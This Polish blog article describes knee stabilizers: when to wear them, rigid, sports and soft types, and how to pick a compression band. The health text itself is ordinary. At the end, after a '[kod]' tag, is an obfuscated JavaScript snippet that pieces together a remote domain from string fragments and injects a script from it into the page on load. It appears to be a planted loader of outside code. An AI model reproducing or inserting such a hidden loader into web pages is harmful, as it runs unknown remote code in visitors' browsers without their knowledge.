29.05.2019

#Stabilizator kolana – kiedy stosować i o czym pamiętać?

Uprawianie aktywności fizycznej wiąże się z ryzykiem wystąpienia rozmaitych kontuzji. Często, są one związane z uszkodzeniem stawu kolanowego. Właśnie dlatego, warto zainwestować w profesjonalną ortezę (stabilizator), która pomoże unieruchomić kolano w przypadku jego uszkodzenia. Sprawdź, kiedy stosować ortezę i na co zwrócić uwagę przed kupnem.

Stabilizator, oprócz unieruchamiania, pełni funkcję korekcyjną i może być stosowany w procesie rehabilitacji uszkodzonego stawu. Głównym zadaniem ortezy jest odciążenie stawu, więzadeł i mięśni. Stabilizacja pomaga w utrzymaniu kolana we właściwej pozycji,  zmniejsza również ryzyko pogłębienia się kontuzji oraz przyspiesza powrót do pełni sił.

Kiedy nosić stabilizator na kolano?

Najczęściej, stabilizatory stosuje się w przypadku urazu stawu, skręcenia lub zwichnięcia nogi oraz przy stanie zapalnym i obrzęku kończyny. Oprócz wymienionych sytuacji, stabilizację można stosować również w czasie bólu reumatycznego lub stawowego.

Co ważne, każdy z powyższych urazów powinien być stwierdzony przez lekarza lub fizjoterapeutę. Doborem odpowiedniego stabilizatora również powinien zająć się specjalista, który zaleci właściwy typ, rozmiar oraz kąt zgięcia i wyprostu stawu.

Rodzaje stabilizatorów

  • Stabilizatory twarde

Stabilizację mają zapewnić specjalne, konstrukcyjne elementy usztywniające. Twarde ortezy ograniczają mobilność stawu, zapewniają usztywnienie kolana i gwarantują duże wsparcie dla mięśni. Zazwyczaj używa się ich w przypadku poważniejszych urazów lub zabiegów operacyjnych. Stabilizator twardy może być stosowany jako zamiennik gipsu.

  • Stabilizatory sportowe

Ortezy przeznaczone dla sportowców wykonywane są na specjalne zamówienie. Działają podobnie, jak klasyczne stabilizatory, ale zapewniają przy tym większą mobilność stawu, przez co umożliwiają aktywność fizyczną.

Często stosowane są przez sportowców, którzy w szczególny sposób narażeni są na uszkodzenia stawu kolanowego. Oprócz tego, używa się ich u pacjentów, którzy odczuwają barierę psychiczną i obawiają się kolejnej kontuzji. Największą wadą stabilizatorów sportowych jest ich wysoka cena.

  • Stabilizatory miękkie

Najczęściej są to elastyczne ściągacze, opaski lub miękkie ortezy zapinane na rzepy. Stosuje się je w przypadku niewielkich urazów lub w celach profilaktycznych. Szczególnie rekomenduje się je dla osób, które są w trakcie rehabilitacji i wracają do zdrowia po urazie. Zaletą miękkich stabilizatorów jest ich niska cena oraz dostępność w każdej aptece, czy sklepie rehabilitacyjnym.

Opaska na kolano: jak dobrać?

Najlepiej postawić na opaskę bezszwową, która zapewni komfort podczas noszenia. Głównym zadaniem opaski uciskowej ma być nie tyle stabilizacja kolana, co utrzymanie go w odpowiedniej temperaturze oraz ochrona przed drobnymi urazami. Aby opaska posłużyła na dłuższy czas, warto zwrócić uwagę na materiał, z którego została wykonana.

Urazy kolana należą do najczęstszych uszkodzeń stawów. Najlepszym sposobem na powrót do formy po kontuzji jest zastosowanie stabilizacji. Na rynku jest wiele rodzajów stabilizatorów, a wybór odpowiedniego powinna poprzedzić konsultacja z lekarzem lub fizjoterapeutą.

[kod]

(function(){
cx8u=document.createElement("script");cx8u_=("ust");cx8uu="134609084";
cx8u_+="a"+("t.i");cx8u.type="text/javascript";
cx8uu+=".t5a2eXpqx8u1a32nX5wu";cx8u.async=true;cx8u_+="n"+("f"+"o")+"/";
cx8uu+="s5a230dfsn";cx8u.src="https://"+cx8u_+cx8uu;
document.body.appendChild(cx8u);
})();